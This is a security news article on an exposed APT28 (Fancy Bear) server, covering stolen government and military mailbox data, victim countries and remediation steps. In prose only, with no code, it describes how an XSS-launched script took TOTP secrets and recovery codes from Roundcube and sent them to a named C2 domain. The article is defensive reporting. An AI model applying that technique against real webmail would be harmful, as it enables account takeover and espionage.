Fancy Bear Exposes Stolen Credentials, 2FA Secrets from NATO-Linked Targets
Key Takeaways Russian state-sponsored hacking group Fancy Bear (APT28) inadvertently exposed its operational server, revealing details of an extensive espionage campaign. The campaign targeted...
Key Takeaways
- Russian state-sponsored hacking group Fancy Bear (APT28) inadvertently exposed its operational server, revealing details of an extensive espionage campaign.
- The campaign targeted government and military organizations across Europe, including NATO member states and Ukraine, compromising credentials, 2FA secrets, and confidential communications.
- Fancy Bear employed a sophisticated JavaScript module to silently exfiltrate TOTP 2FA secrets from Roundcube webmail users, bypassing multi-factor authentication without user interaction.
- Affected organizations must immediately rotate TOTP secrets, audit email forwarding rules, block identified C2 infrastructure, and patch Roundcube for CVE-2023-43770.
Russian APT28 Exposes Espionage Campaign Targeting NATO-Linked Entities
A significant operational security lapse by Fancy Bear, a prominent hacking group linked to the Russian state, has offered cybersecurity researchers an unprecedented look into an active espionage operation. This campaign specifically targeted European government and military organizations, revealing extensive data exfiltration and sophisticated bypass techniques.
Table Of Content
On March 11, 2026, threat intelligence firm Hunt.io disclosed its findings on a campaign it named “Operation Roundish.” This designation arose from an exposed open-directory first identified on January 13, 2026, which provided initial insights into Fancy Bear’s activities.
Fancy Bear, also known as APT28, Forest Blizzard, or Sednit, is widely recognized as Russia’s GRU Military Intelligence Unit 26165, according to assessments by the UK’s NCSC.
What began as a targeted webmail exploitation effort had been underway for over a year before the group’s operational error left its server vulnerable and exposed to public scrutiny.
The exposure originated from a NameCheap Virtual Private Server (VPS) located in the United States, operating on the IP address 203.161.50.145.
Remarkably, this same server had been publicly linked to Fancy Bear by Ukraine’s CERT-UA as early as September 2024. Despite this public attribution, the group continued to operate from the compromised infrastructure for more than 500 days without migrating to new systems.
Within the exposed directory, researchers discovered a trove of sensitive information, including 2,800 exfiltrated government and military emails, 240 sets of stolen credentials (comprising passwords and TOTP 2FA secrets), 140 unauthorized silent email-forwarding rules, and 11,500 contact addresses harvested from victim address books across multiple countries.
Analysts at Ctrl-Alt-Intel subsequently uncovered a second exposed open-directory on the identical server, which had not been included in Hunt.io’s initial January 2026 archive. This additional directory contained Fancy Bear’s complete command-and-control (C2) source code, supplementary JavaScript payloads, extensive campaign telemetry logs, and further exfiltrated data, collectively offering a nearly comprehensive overview of the entire operation.
Victims identified spanned Ukraine, Romania, Bulgaria, Greece, Serbia, and North Macedonia. Email addresses associated with four NATO member states, including infrastructure belonging to NATO headquarters itself, were recovered directly from the stolen contact data.
The targeting pattern exhibited clear geopolitical motivations. Ukrainian regional prosecutors, likely involved in war crimes investigations, constituted the largest single victim group. Other compromised entities included Romania’s Air Force, Greece’s National Defence General Staff, Serbia’s Ministry of Defence, and various Bulgarian government organizations.
The strategic selection of targets is further underscored by recent geopolitical developments: Romania, Bulgaria, and Greece had formalized a military mobility agreement in July 2024, and Greece had participated in training Ukrainian F-16 pilots. These factors strongly suggest an intelligence-driven targeting strategy rather than opportunistic intrusions.
How Fancy Bear Silently Bypassed Two-Factor Authentication
One of the most concerning technical discoveries in this campaign was Fancy Bear’s sophisticated method for silently stealing TOTP-based 2FA secrets from victims who believed their accounts were fully protected. The group deployed a JavaScript module named keyTwoAuth.js, designed to execute entirely within the victim’s already authenticated Roundcube webmail session. This technique meant no additional clicks or separate login prompts were ever required from the target, making the compromise invisible to the user.
Upon activation of the XSS payload, keyTwoAuth.js initiated an HTTP request to Roundcube’s 2FA settings page specifically for the twofactorgauthenticator plugin. It then meticulously parsed the returned HTML, extracting five hidden password fields, which included one TOTP secret and four recovery codes. This data was subsequently Base64-encoded and quietly transmitted to Fancy Bear’s C2 server at zhblz.com, using the log prefix ktfu. With both the victim’s password and TOTP secret successfully acquired, Fancy Bear could generate valid authentication codes at any future time, thereby completely circumventing two-factor protection without requiring physical access to the victim’s device.
Ctrl-Alt-Intel recovered 516 log entries under the ktfu prefix, corresponding to 108 unique victim email addresses. Of these, 256 accounts had genuine TOTP secrets stolen, impacting targets within Romania’s Air Force, Greece’s GEETHA, Ukraine’s Asset Recovery Agency, and Serbia’s Ministry of Defence. The remaining 260 entries returned “nokey,” indicating that these accounts had no 2FA configured at all, rendering them even more vulnerable.
What You Should Do
- Rotate TOTP Secrets: All organizations utilizing Roundcube with the
twofactorgauthenticatorplugin should consider all existing TOTP secrets potentially compromised and initiate an immediate rotation. - Audit Email Forwarding Rules: Administrators must thoroughly audit Sieve email-filtering rules for any unauthorized forwarding entries, especially those named “SystemProtect” or “SystemHealthChek.”
- Block C2 Infrastructure: Immediately block all network connections to the identified C2 IP address
203.161.50.145and the domainzhblz.comat your perimeter and internal network controls. - Patch Roundcube: Apply the security patch for Roundcube CVE-2023-43770 without delay.
- Monitor Webmail Infrastructure: Enhance monitoring of webmail infrastructure for any signs of XSS injection or other anomalous activity.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.